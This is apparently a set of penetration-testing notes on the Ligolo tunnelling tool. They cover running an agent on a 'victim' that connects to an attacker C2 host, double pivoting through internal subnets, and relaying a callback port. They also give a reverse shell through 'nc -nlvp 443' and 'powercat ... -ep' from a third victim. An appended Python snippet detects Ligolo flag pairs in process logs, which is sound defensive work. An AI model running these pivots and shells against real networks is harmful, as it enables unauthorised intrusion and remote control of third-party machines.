Ligolo

Server (proxy)

setup
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

ip addr show ligolo

start server
./proxy -laddr 0.0.0.0:3389 -selfcert

choose a common port (3389, 25, 123); the default is 11601

Victim (agent) - single pivot

./agent -connect attacker_c2_server.com:53 -ignore-cert

Server after the victim joins

@ligolo: check network config
session 
1

>> agent xx
ifconfig

in the same 192.168.w.0/24 subnet; the victim has access to 192.168.x.0/24

add the corresponding network
sudo ip route add 192.168.x.0/24 dev ligolo
ip route list
@ligolo session
>> agent xx
start
nmap 192.168.x.0/24

Victim 2 (2nd agent) - double pivot

in 2nd agent
./agent -connect attacker_c2_server.com:53 -ignore-cert

Server after the victim joins

@ligolo: check network config
session 
2

>> agent yy
ifconfig

the machine in 192.168.x.0/24 has access to the 192.168.y.0/24 subnet

add the corresponding network
sudo ip route add 192.168.y.0/24 dev ligolo
ip route list
@ligolo session 1
stop

session
2

>> agent yy
start

to switch tunnels, simply run start in the 2nd session and choose to close the 1st tunnel at the prompt

Port forward in 2nd agent to receive callback from 3rd victim

traffic to port 25 on victim 2 (agent 2) is directed to the listener on port 443 on the attacker (server)

@ligolo session 2
>> agent yy
listener_add --addr 0.0.0.0:25 --to 127.0.0.1:443 --tcp

listener_list
listener_stop

a machine in the 192.168.y.0 subnet calls back to 192.168.x.0:25, which is forwarded to kali at 192.168.w.0:443

listener_add --addr 0.0.0.0:8081 --to 172.16.202.194:8081 --tcp
on kali (192.168.w.0):
nc -nlvp 443
on the 192.168.y.0 machine:
powercat -c 192.168.x.0 -p 25 -ep

Access agent's local port

sudo ip route add 240.0.0.1/32 dev ligolo
nmap 240.0.0.1
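
Detection note (added example, not part of the original notes or of the Ligolo project): the agent and proxy command lines above carry distinctive flag pairs, and the code below tags them in process-creation logs. It assumes the flags follow Go's standard syntax (-flag value, --flag, -flag=value); the function names, tag names and sample lines are constructed for illustration.

```python
# Added example: tag Ligolo-style agent/proxy command lines in process logs.
# Assumption: flags follow Go's standard flag syntax (-f v, --f v, -f=v).
DEFAULT_PORT = 11601                  # proxy default noted on this page
COMMON_PORTS = {25, 53, 123, 3389}    # "common" ports these notes pick

def parse_flags(cmdline):
    """Return {flag_name: value_or_True}, ignoring the executable itself."""
    tokens = cmdline.split()          # assumes no spaces inside arguments
    flags, i = {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-") and tok.strip("-"):
            name, has_eq, value = tok.lstrip("-").partition("=")
            nxt = tokens[i + 1] if i + 1 < len(tokens) else "-"
            if not has_eq and not nxt.startswith("-"):
                value, i = nxt, i + 1   # "-flag value" form
            flags[name.lower()] = value or True
        i += 1
    return flags

def findings(cmdline):
    """Return indicator tags for one command line (empty list = no match)."""
    flags = parse_flags(cmdline)
    if "connect" in flags and "ignore-cert" in flags:
        tags, endpoint = ["agent-no-cert-check"], flags["connect"]
    elif "laddr" in flags and "selfcert" in flags:
        tags, endpoint = ["proxy-selfsigned"], flags["laddr"]
    else:
        return []                     # a single flag alone is too noisy
    port = str(endpoint).rpartition(":")[2]
    if port.isdigit():
        if int(port) == DEFAULT_PORT:
            tags.append("default-port")
        elif int(port) in COMMON_PORTS:
            tags.append("common-port-%s" % port)
    return tags

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE = [
    "./agent -connect attacker_c2_server.com:53 -ignore-cert",
    r"C:\Users\Public\svc.exe --ignore-cert --connect=203.0.113.7:11601",
    "./proxy -laddr 0.0.0.0:3389 -selfcert",
    "/usr/bin/curl --connect-timeout 5 https://example.org/",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(findings(line) or "-", "|", line)
```

Matching on the flag pair rather than the binary name keeps the rule effective when the agent is renamed, as in the second sample line.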
